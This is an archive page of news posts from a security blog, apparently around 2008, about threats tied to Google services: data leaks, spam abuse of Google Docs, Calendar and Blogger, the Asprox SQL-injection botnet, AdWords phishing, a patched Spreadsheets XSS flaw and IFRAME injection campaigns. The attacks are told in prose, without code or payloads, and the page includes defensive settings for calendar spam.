CyberInsecure.com

Archive for the ‘Google’ Category

Private details and social security numbers of 5,000 Columbia University students had been searchable online for the last 16 months. Students received an e-mail message on Tuesday night from the vice president of student auxiliary and business services, Scott Wright, explaining that in February 2007, a student employee had posted a database of students’ housing information on a Google-hosted Web site.

On June 3, Columbia University’s Housing and Dining department was informed that one archival database file containing housing information of current and former undergraduate students. It appears that the file was inadvertently posted by a former student employee in February 2007. Upon university request, Google immediately removed this file.

Columbia Public Safety investigators have concluded that this security breach was unintentional. Columbia University would not identify the student, saying only that the person had worked in the university’s housing office. A similar leak occurred in April 2007, when the university noticed that three databases containing students’ addresses and Social Security numbers were online.

Several students created an online petition and posted it to the main campus Web log, demanding that the university investigate the former employee and issue a report explaining how security will be increased. The petition address is www.petitiononline.com/breach/petition.html.

No financial data was included in the file in question, and there is no evidence of identity theft. Phone number for questions or comments is 1(888) 882-7331. Email: studentservices-assist@columbia.edu.

Spammers have adopted Google Docs in order to gain the credibility of Google’s domain, since spam filters would not declare a Google link as spam. According to MessageLabs, this latest spammers technique is used to get around blocking and blacklisting of spam hosting domains.

Since hosted Google Docs have the domain docs.google.com, it could be possible to ban that address, but there many users of this documentation platform and there will be a high amount of blocked proper non-spam emails. A very popular way to block spam is with URL block lists, but with the name “Google” in it, it’s never going to be blocked because of all the legitimate uses.

Sending attachments like JPGs or Word .doc files has proven less than successful when compared to just sending the user a link and thats why the new misuse of Google Docs might become more popular. Spam with just a URL also isn’t foolproof. Spam filters have relied on checking the links in e-mails and blocking them based on suspicious Web addresses.

The way around this is checking the IP of the sender which might be hard for companies. Unless they can do it based on source IP, the only way to catch it is through sender IP reputation level.

There is also a good side in this technique, and it is the fact that Google Docs pages are much less dynamic than HTML. The best spammers can do is put links in the page to get victims to click through to another site. HTML code can not be embedded, no malicious IFRAME can be added, no malicious JavaScript code could run. Another problem would be creation of a lot of Google accounts. It wouldn’t be easy to do because Google has methods in place to stop automation of account creation (CAPTCHA).

MessageLabs has found am example, a typical sexual enhancement advertisement, that asked the recipient to click on the link to a Google Doc page. From the page, more links to purchase Viagra. The page was reported as spam to Google on May 8 but the page is still live.

So far, MessageLabs hasn’t seen large numbers for this method yet, but Google’s Blogspot blogging service is frequently used by spammers, so the spammers may just be getting started. Spammers still use Blogspot as an intermediate drop page, so they may refine this method a little more and stick with it, unless it fails their spamming hopes and they drop it.

There is no Google response available on this subject at this moment.

The Asprox botnet, which specializes in sending phishing spam, now using a SQL injection attack tool designed to hack legitimate websites, a move meant to add more hijacked PCs to its collection. According to SecureWorks, the botnet is pushing an update to the infected PCs it controls by sending an executable file, msscntr32.exe, that installs as a Windows service called “Microsoft Security Center Extension”. In reality, the file is an SQL injection attack tool.

After the Asprox botnet seeds its bots with the msscntr32.exe file, the attack tool launches and uses Google’s search engine to find potentially vulnerable website pages. It then hits those pages with a SQL-injection attack and, if successful, plants a malicious IFRAME on the site. Visitors are redirected through a series of malware-hosting servers that try one or more exploits to infect their PC. If that works, a Trojan horse is downloaded and installed on the PC, adding it to the Asprox botnet; those compromised PCs are then used to spew more phishing spam.

So far, Asprox zombies have infected only about 1,000 pages, which carry javascript pointing to sites including direct84.com and adword71.com. In addition to silently feeding end users Asprox malware, the poisoned pages also push malware for a competing botnet known as Cutwail. The sites also try to install WinFixer, a notorious software title that falsely tells users are infected by malware in an attempt to trick them into buying bogus anti-malware products.

Security vendors, including F-Secure Corp. and Symantec Corp., have also uncovered evidence of new waves of SQL-injection attacks. Those firms have been pinning responsibility on Chinese hackers who are compromising legitimate sites to spread malware to steal game passwords.

SQL injection attacks have become widespread as criminals increasingly target legitimate websites, figure out a way to hack them, then plant IFRAMEs on those sites to redirect users to malicious servers. Those servers silently attack visitors’ PCs, often trying multiple exploits, and if one works, they download additional code to the machine to hijack it from its rightful owner and add it to an army of infected systems.

Some analysts have mistakenly concluded that the SQL injection tool is using worm-like tactics. According to SecureWorks, the tool does not spread on its own but relies on the Asprox botnet to propagate to new hosts.

Google Adwords account holders are being targeted by criminals who trick them into handing over credit card information using a URL spoof has gained popularity in recent weeks.

The scam follows a traditional attack route involving the sending of spam emails to random Internet addresses in the hope of finding users who have purchased Adwords. The email claims that the user’s account payment has failed and asks them to “update payment information”, again a transparent tactic by today’s standards.

Proper looking http://adwords.google.com/select/login link embedded into email, a correct Google login address. However, it actually leads to http://www.adwords.google.com.********.cn/select/Login, an obfuscated address that directs to a site associated with IPs in Germany, Romania, and the Czech Republic.

The site is a good copy of the real Google Adword site, and appears to let users login using their real account details. Obviously, any account details will work. Entering payment details results in that information being posted using an SSL link to a remote server after which the account will be hijacked.

The attack has been publicized by security software company Trend Micro, but the disarmingly simple scam is widespread enough to have been received by ordinary users in recent days. The latest phishing attack bears a strong resemblance to a near-identical campaign launched a few weeks back by Chinese criminals.

As common as “account update” attacks have become, the spoofed URL is still the key to reeling in victims. Criminals seem to have realized that users are paying more attention to such details.

An increasing number of spam emails being sent disguised as meeting invitations. Spammers are using the meeting invite features of both Google Calendar and Microsoft Outlook to send messages advertising, for example, the latest designer watches and prescription drugs. The messages are recognized and viewed by many mail clients as proper meeting invitations and actually get added to the calendar of the user who receives the spam, unless they specifically decline the request. It’s been becoming more and more common and has been recently reported by Security Fix on The Washington Post, Websense and ISC.

In some applications with default settings this kind of spam processed in ways that allow a spammer, or potentially a malicious attacker, to use methods for delivering their content that are not so commonly seen or as easily recognized by users as junk or malicious content. Many users have learned that it’s bad to click on links in emails, but it’s less frequent for them to be told not to click on links in meeting requests, or in the body of the meetings in their calendars.
While some email systems like GMail/Google Calendar and a compatible version of Outlook handle meeting requests as a different type of message specific to meetings, many email systems handle them as normal emails sent with particularly formatted attachments that follow a standard known as iCalendar. Applications that support these sorts of attachments are common, with most of the major email clients which also have some sort of calendar integration, supporting them in some way, including Microsoft Outlook, Mozilla Calendar (as well as Sunbird and Lightning), and Apple’s iCal. Some web-based clients, like GMail, also support these messages. By the standard, these files are plain text, UTF-8 encoded files with an extension such as .ical, .ics, etc., though this can vary from one implementation to another. With Outlook, the problem seems to originate the program itself. When Outlook receives a meeting invite, it blocks off the time period requested on a provisional basis until the recipient either accepts or declines the invite.

Google Calendar users can set it to show only those events that they have created or accepted. According to Google, here’s how to do that:

1. Click on “Settings” at the top of any Google Calendar page
2. Select the “General” tab if it isn’t selected already.
3. In the “Automatically add invitations to my calendar” section,
select “No, only show invitations to which I have responded.”
4. Click on “Save.”

Calendar users can report calendar spam by visiting this link.

To stop the automatic addition of a meeting when the e-mail is received in Outlook, clear the check box for “Process requests and responses on arrival” as follows:

1. On the Tools menu, click Options.
2. Click Email Options.
3. Click Tracking Options.
4. Click to clear the “Process requests and responses on arrival” check box.

This still doesn’t stop the creation of a tentative meeting if the e-mail is opened or viewed in the reading (preview) pane.

There are many other applications that use these invitations. Users should be aware that this is possible, regardless of what applications they might be using that could be spammed or attacked using these techniques. Just because users see a meeting request and not an email, doesn’t mean that it’s any safer to click on links.

Spammers, in their recent tactics, have targeted Google’s well-known blog publishing system “Blogger”/”Blogspot”, following the previous attacks on Microsoft’s Live Mail Anti-CAPTCHA, Google’s Gmail Anti-CAPTCHA and Microsoft’s Live Hotmail Anti-CAPTCHA services.

The automated bots are capable of not only signing up and creating Blogger accounts (using spammer account credentials), but also use these accounts as redirectors and doorway pages for advertising their products and services. In the current attack, accounts using anti-CAPTCHA operations at Blogger get registered, and few lines of script or code is used to refresh the account, thus directing the user to the actual spam domain.

For spammers, there could be few main advantages to this approach. A free to sign up where accounts can be used as redirectors or doorway pages to spammers’ domain(s). Spammers include these redirecting accounts in different spam campaigns rather than including their actual spam domains and use this tactic to defeat a range of anti-spam services.
These redirecting or doorway page accounts can also be used in multiple mass-mailing campaigns for subsequent attacks.
Another advantage is the difficulty to keep track of these accounts as millions of users worldwide are using Google’s Blogger services on a regular basis.

The entire automated process in is built of two stages. First, predefined instructions from the CAPTCHA breaking host injected on to bot infected or victim’s machine. Instructions are used as templates, with varying account credentials and spam domain redirecting script. Second, bot infected or victims’ machine performing tasks are per pre-defined instructions. Spammers are trying to improve the Anti-CAPTCHA techniques and performed validation checks are sent to their email addresses.

These accounts could be used by the spammers at any time for a variety of social-engineering attacks, a trend that has been increasingly common with various popular Web 2.0 sites.

Security researchers have unpicked a flaw in Google spreadsheets that allows cookie stealing. The cross-site scripting vulnerability enables attackers to use stolen cookies to access any Google service a user has registered, including accessing a victim’s Google mail account. Google has now plugged the vulnerability, discovered by security researcher Billy Rios. A Google cookie is valid across all its sub domains, a convenience factor that greatly enhances the potential for mischief.

This particular XSS vulnerability on Google’s domain takes advantage of how IE determines the content type of the HTTP response being returned by the server. Other browsers have problems in handling content-type headers properly, but this vulnerability is limited to IE.

Rios created a spreadsheet which contained HTML and a string of JavaScript code for viewing a user’s cookie. He then saved this spreadsheet and generated a link for the spreadsheet to be served as a text-based CSV file, which IE mistakenly interprets as HTML.

Anyone viewing this doctored spreadsheet would hand over their cookies to Rios, or potentially an attacker. Fortunately, Google has now rendered crafted table content as text rather than HTML.

Google might allow Brazilian police to access 3,261 private photo albums on social networking website Orkut, which may contain child pornography. This move is part of a strategy announced by the head of the company in Brazil, Alexandre Hohagen, to a Senate Committee set up to investigate cases of paedophilia in the country. In the last two years nearly 90 percent of the 56,000 complaints in Brazil about net-based paedophilia were linked to the website. Until September 2007, all requests for information about users suspected of crimes such as racism or paedophilia were sent to Google US to be examined.

Every time abuse is reported within Orkut, the administrators must immediately delete the images, destroying the proofs. The company is working on a collaboration between Brazilian authorities and the US organization.

The private photo albums, considered by some as a safe haven for criminals, were introduced in November 2007, and allow users to block access to the pictures by anyone outside their direct network. They were created to protect the privacy of those who didn’t want personal pictures to be seen by anyone and it is being well used by the majority of the users. Google apparently has no plans to disable this option.

Thousands of users are experiencing problems receiving e-mail from Gmail users recently. Over the past month, major anti-spam vendors have had to apply scrutiny to Gmail in a way they haven’t had to before, and the result is reduced delivery performance and sometimes outright blocking of Gmail. Some messaging hosts are being instructed to reject SMTP connections from Google.

The reason is defeated CAPTCHA for Gmail that was announced in February. According to sources around the anti-spam industry, the result has been a marked increase in spam originating from Gmail SMTP servers. Some say the spam increase started even earlier.

A support analyst with MessageLabs, a major provider of software-as-a-service anti-spam filtering, said that “some spammers have hacked into the Gmail captcha system, and were able to relay spams appearing to come from Googlemail’s IP addresses. This has caused many IPs of theirs to appear to be sources of spam.” For their customers, this means a decrease in performance. “We have a traffic-shaping system that throttles IPs that we believe to appear to be a source of spam. The result is that for the past couple of days we have been seeing issues like this with Gmail,” the analyst concluded.

Gmail has sent out a lot of spam recently, and they are registering on traffic shaping systems. When spam is sent out over a Gmail relay, that relay can sometimes get completely blocked, causing problems for thousands of legitimate Gmail users. MessageLabs then has to throttle only the SMTP relays that are spamming.

Blocking problems has been verified, as well as extremely long delays in delivering messages. Delays of four hours and up to 24 hours have been seen. The problem can be maddening because not all Gmail relays are affected. Hence you may be getting some e-mail on time, while others aren’t coming through. Even some corporate Google e-mail has been blocked.

Postini (which was acquired by Google last year) anti-spam filtering service does not appear to be affected at this time. Purely client-side filters such as SpamBayes are also not affected.

The damage currently appears limited to select SaaS filtering solutions, such as MessageLabs and Antigen. There are unconfirmed reports from Microsoft as well. A source at another anti-spam company who wished to remain anonymous did say that Google can expect more problems if the CAPTCHA crack cannot be stopped. His product team was already working on the issue, but they were unsure how best to handle it.

Google News search results are currently infected with spam pages from a hacked authority blog (maybe even blogs). A simple search for “migraine” in Google News will show about 120 results with links to “cialis” spam from a folder containing specially generated spam pages from blog.oup.com (Oxford University Press Blog). The results are supposed to be sorted by “relevance”. Do not click on the search results, those pages might contain exploits that can infect your PC via the browser (usually Internet Explorer). Click here for a screenshot.

It seems that not only Oxford University Press Blog was hacked and spam pages were added, but Google News mechanism added those pages without verification since they are hosted on a trusted news domain, at oup.com. The reason is, of course, an old Wordpress blog version with a vulnerability that got exploited.

More keywords will trigger the same response from Google News. Some keywords are “Osteoarthritis”, “anxiety” “osteoporosis”, “blood pressure”, “viagra”, and many others.

Regular Google search for blog.oup.com shows some interesting results as well. It seems that the folder /wp-content/themes/default/images which normally contains pictures for the blog, currently contains an extra folder called “ph” where all the spam pages are located. Click here for a screenshot.

Spam pages are promoting “Trusted Pharmacy” and it obviously worked out for Google News, since those pages were added right away into news search results. Google’s filters have not picked up infected blog since the blog is a verified source of news and, most likely, all of the content from the domain blog.oup.com is trusted. Not only that, somehow those spam pages were categorized as “relevant” to the searches in question.

It seems there is a need for a ranking mechanism that takes into account not only the reputation of certain source but also verifies that the source was not hacked and spam/infected pages are not injected into Google. Our trust in Google’s “safe for visit” filtered News results becomes more and more important. Unlike web search, which can be indexed, filtered and updated over the course of months, the news index has to be extremely fresh; for this reason, algorithms like PageRank cannot function properly and thats the reasons no verifications are made to websites once approved as trusted.

UPDATE: Senior Customer Service Rep from Oxford University Press has put a ticket in their systems support group to investigate this issue. Hopefully this hacked blog will be taken down by Oxford University Press soon.

A massive IFRAME injection attack, which stared last week, is slowly turning into a large scale web application vulnerabilities audit of high profile sites. Last week Symantec has rated the attack as medium risk, StopBadware and US-CERT issued a warning about the incident. After another week of monitoring the campaign and the type of latest malware and sites targeted, the campaign is still up and running, poisoning what looks like over a million search queries with loadable IFRAMES, whose loading state entirely relies on the site’s web application security practices.

The main IPs within the IFRAMES acting as redirection points to the newly introduced rogue software and malware, remain the same, and are still active. High profile websites successfully injected with IFRAMES forwarding to the rogue security software and Zlob malware variants. Some of the websites attacked:

USAToday.com, ABCNews.com, News.com, Sears.com, Circuitcity.com, Target.com, Packard Bell.com, Walmart.com, Forbes.com, Ugo.com, Bartleby.com, Linkedwords.com, Rediff.com, MiamiHerald.com, Bloomingdales.com, PatentStorm.us, WebShots.com, Allwords.com, Blogdigger.com, Epinions.com, Buyersindex.com, Jcpenney.com, Nakido.com, Uvm.edu, hobbes.nmsu.edu, jurist.law.pitt.edu, boisestate.edu

The number and importance of the sites has increased, Google is to what looks like filtering the search results despite that the malicious parties may have successfully injected the IFRAMEs already, thus trying to undermine the campaign, new malware and fake codecs are introduced under new domain names, and a couple of newly introduced domains within the IFRAMES themselves.

Google is actively filtering the results and removing the cached pages on number of domains. The attack is now continuing, starting two weeks ago, the main IPs behind the IFRAMES are still active, new pieces of malware and rogue software is introduced hosting for which is still courtesy of the RBN, and we’re definitely going to see many other sites with high page ranks targeted by a single massive SEO poisoning in a combination with IFRAME injections.
(more…)

Researchers from MarkMonitor, a brand-protection firm, compiled a list of 750 Google search terms that are used to track down websites likely to have easily exploitable vulnerabilities - mostly PHP-based sites. Three-quarters of phishing sites are built on hacked servers that have been tracked down using pre-programmed Google search terms, according to the research. Among other activities, MarkMonitor tracks phishing attacks that target brand names.

MarkMonitor found that 75 percent of the phishing sites it had discovered had been originally tracked down using one of the list of 750 Google search terms. The finding was based on a sample of one-quarter of the phishing sites logged by the firm.

The search terms return a list of sites likely to have particular vulnerabilities; the attackers then exploit the vulnerability, gain access to the site, and then use it to host malicious code, counterfeit web pages (phishing) and spam redirection “doorways”, as part of the scam. Search terms, are actively traded on internet forums, and are routinely scanned by IRC-based “bots”, which also scan Yahoo and AOL Search results, according to MarkMontitor.

Google has already made moves to block automated exploitation, but they can still be used manually. The websites exploited tend to be small, local PHP-based sites, which are less likely to have the latest patches installed, and are invaded via one of more than 1,800 known PHP bugs.

Auction sites are the biggest targets, accounting for 44 percent of the phishing emails in the fourth quarter, up from 36 percent in the first quarter of 2007. In the fourth quarter of 2007, 412 organisations were targeted by phishing attacks, up 37 percent from the same period in 2006, according to the firm’s brand-jacking index, published last month.